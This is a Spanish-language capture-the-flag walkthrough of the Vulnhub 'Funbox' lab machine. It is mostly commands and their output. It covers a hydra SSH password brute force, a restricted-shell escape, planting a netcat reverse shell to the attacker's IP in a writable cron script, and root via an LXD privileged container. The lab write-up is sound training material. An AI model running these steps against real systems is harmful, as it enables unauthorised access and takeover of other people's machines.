[VULNHUB] Funbox

Hoy vamos a hackear la maquina de Vulnhub llamada Funbox.Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/funbox-1,518/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 09:27 CEST Nmap scan report for funbox.home (192.168.1.67) Host is up (0.016s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/secret/ |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to http://funbox.fritz.box/ |_https-redirect: ERROR: Script execution failed (use -d to debug) 33060/tcp open mysqlx? | fingerprint-strings: | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: | Invalid message" |_ HY000 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port33060-TCP:V=7.80%I=7%D=7/28%Time=5F1FD36D%P=x86_64-pc-linux-gnu%r(N SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\ SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2 SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0") SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01 SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\" SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9 SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\ SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0 SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString, SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0 SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\ SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9," SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1 SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000 SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0 SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0 SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\ SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.74 seconds
    Vemos que apache hace referencia a http://funbox.fritz.box asi que agregamos a /etc/hosts la siguiente linea: 192.168.1.67 funbox.fritz.box Al visitar la pagina vemos que se trata de Wordpress. Usamos wpscan para ver si tiene alguna vulnerabilidad y enumerar usuarios.
    ~ > wpscan --url "http://funbox.fritz.box/" --enumerate u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.2 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N] [+] URL: http://funbox.fritz.box/ [192.168.1.67] [+] Started: Tue Jul 28 09:35:30 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://funbox.fritz.box/robots.txt | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce ss [+] http://funbox.fritz.box/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10). | Found By: Rss Generator (Passive Detection) | - http://funbox.fritz.box/index.php/feed/, https://wordpress.org/?v=5.4.2 | - http://funbox.fritz.box/index.php/comments/feed/, https://wordpress.org/?v=5.4.2 [+] WordPress theme in use: twentyseventeen | Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/ | Latest Version: 2.3 (up to date) | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt | Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 2.3 (80% confidence) | Found By: Style (Passive Detection) | - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507 , Match: 'Version: 2.3' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <==========> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] joe | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Tue Jul 28 09:35:35 2020 [+] Requests Done: 26 [+] Cached Requests: 36 [+] Data Sent: 6.525 KB [+] Data Received: 257.882 KB [+] Memory used: 159.355 MB [+] Elapsed time: 00:00:04
    Vemos que encuentra los usuarios admin y joe. Hacemos bruteforce a ssh, con el usuario joe y el diccionario rockyou.txt
    ~ > hydra -l joe -P rockyou.txt 192.168.1.67 ssh -I Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 14:54:49 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.1.67:22/ [22][ssh] host: 192.168.1.67 login: joe password: 12345
    Encontramos la password para joe, es 12345. Nos logueamos por ssh!
  • Low Shell
  • ~ > ssh joe@192.168.1.67 joe@192.168.1.67's password: Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information disabled due to load higher than 1.0 * "If you've been waiting for the perfect Kubernetes dev solution for macOS, the wait is over. Learn how to install Microk8s on macOS." https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/ 33 updates can be installed immediately. 0 of these updates are security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update You have mail. Last login: Sat Jul 18 10:02:39 2020 from 192.168.178.143 joe@funbox:~$
    Al entrar vemos que estamos en una restricted shell. Si miramos el .bash_history de joe podemos ver una forma de escapar:
    ssh joe@funbox -t "bash --noprofile"
    Sabiendo esto, volvemos a conectarnos por ssh pero evadiendo la restricted shell.
    ~ > ssh joe@192.168.1.67 -t "bash --noprofile" joe@192.168.1.67's password:
    Una vez dentro, nos descargamos pspy64 desde nuestro equipo para ver si se ejecuta alguna tarea programada que nos interese. Descargamos pspy64.
    joe@funbox:/tmp$ wget http://192.168.1.111/pspy64 --2020-08-05 08:21:16-- http://192.168.1.111/pspy64 Connecting to 192.168.1.111:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: ‘pspy64’ pspy64 100%[=========================>] 2.94M --.-KB/s in 0.02s 2020-08-05 08:21:16 (126 MB/s) - ‘pspy64’ saved [3078592/3078592]
    Damos permisos de ejecucion.
    joe@funbox:/tmp$ chmod +x pspy64
    Y por ultimos ejecutamos.
    joe@funbox:/tmp$ ./pspy64 ---SNIP--- 2020/08/05 08:22:01 CMD: UID=1000 PID=2699 | /bin/bash /home/funny/.backup.s ---SNIP---
    Podemos ver que hay una tarea programada que ejecuta un script. 2020/08/05 08:22:01 CMD: UID=1000 PID=2699 | /bin/bash /home/funny/.backup.s Miramos los permisos del fichero para ver si podemos modificarlo.
    joe@funbox:/tmp$ ls -l /home/funny/.backup.sh -rwxrwxrwx 1 funny funny 55 Jul 18 10:15 /home/funny/.backup.sh
    Tenemos permisos :) Nos descargamos nc en la maquina.
    joe@funbox:/tmp$ wget http://192.168.1.111/nc --2020-08-06 07:04:53-- http://192.168.1.111/nc Connecting to 192.168.1.111:80... connected. HTTP request sent, awaiting response... 200 OK Length: 35520 (35K) [application/octet-stream] Saving to: ‘nc’ nc 100%[=========================>] 34.69K --.-KB/s in 0s 2020-08-06 07:04:53 (161 MB/s) - ‘nc’ saved [35520/35520]
    Le damos permisos de ejecucion.
    joe@funbox:/tmp$ chmod +x nc
    Editamos el script y usamos nc para obtener una reverse shell.
    joe@funbox:/tmp$ cat /home/funny/.backup.sh #!/bin/bash /tmp/nc -e /bin/bash 192.168.1.111 5555
    Ponemos pwncat a la escucha:
    ~ > pwncat -l -p 5555 [19:17:20] received connection from 192.168.1.67:54048 connect.py:148 [19:17:21] new host w/ hash eb16a4311e0222952063c0182d5d9541 victim.py:329 pwncat running in /usr/bin/bash victim.py:363 pwncat is ready
  • Privilege Escalation
  • Ahora ya tenemos los privilegios de funny. Vemos que funny esta en el grupo de lxd. Buscamos donde se encuentra el ejecutable "lxd".
    funny@funbox:/$ find / -name lxd 2>/dev/null /var/snap/lxd /var/snap/lxd/common/lxd /snap/bin/lxd /snap/lxd /snap/lxd/16100/bin/lxd /snap/lxd/16100/commands/lxd /snap/lxd/16530/bin/lxd /snap/lxd/16530/commands/lxd funny@funbox:/$
    Modificamos el PATH para agregar la carpeta donde se encuentra el ejecutable de lxd.
    funny@funbox:/$ export PATH=/snap/bin:$PATH
    Empezamos la escalada de privilegios ejecutando lxd init. Para ello deberemos crear un container, y montar la raiz del host en alguna carpeta del container, de ese modo, al ser root en el container podremos ver todo el contenido de la carpeta montada, es decir, tendremos acceso a todo el FS del host.
    funny@funbox:/$ lxd init
    Dejamos el resto de valores por defecto.
    Would you like to use LXD clustering? (yes/no) [default=no]: Do you want to configure a new storage pool? (yes/no) [default=yes]: Name of the new storage pool [default=default]: Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: Create a new BTRFS pool? (yes/no) [default=yes]: Would you like to use an existing empty disk or partition? (yes/no) [default=no]: Size in GB of the new loop device (1GB minimum) [default=5GB]: Would you like to connect to a MAAS server? (yes/no) [default=no]: Would you like to create a new local network bridge? (yes/no) [default=yes]: What should the new bridge be called? [default=lxdbr0]: What IPv4 address should be used? (CIDR subnet notation, “auto†or “noneâ€) [default=auto]: What IPv6 address should be used? (CIDR subnet notation, “auto†or “noneâ€) [default=auto]: Would you like LXD to be available over the network? (yes/no) [default=no]: Would you like stale cached images to be updated automatically? (yes/no) [default=yes] Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
    Creamos el container.
    funny@funbox:/tmp$ lxc init ubuntu:16.04 test -c security.privileged=true Creating test funny@funbox:/tmp$ lxc config device add test whatever disk source=/ path=/mnt/root recursive=true Device whatever added to test funny@funbox:/tmp$ lxc start test funny@funbox:/tmp$ lxc exec test bash
    Por ultimo, dentro del container, buscamos la flag de root.
  • flag.txt
  • root@test:~# cd /mnt/root/root root@test:/mnt/root/root# ls flag.txt mbox snap root@test:/mnt/root/root# cat flag.txt Great ! You did it... FUNBOX - made by @0815R2d2
  • End
  • Y con esto ya seriamos root de la maquina.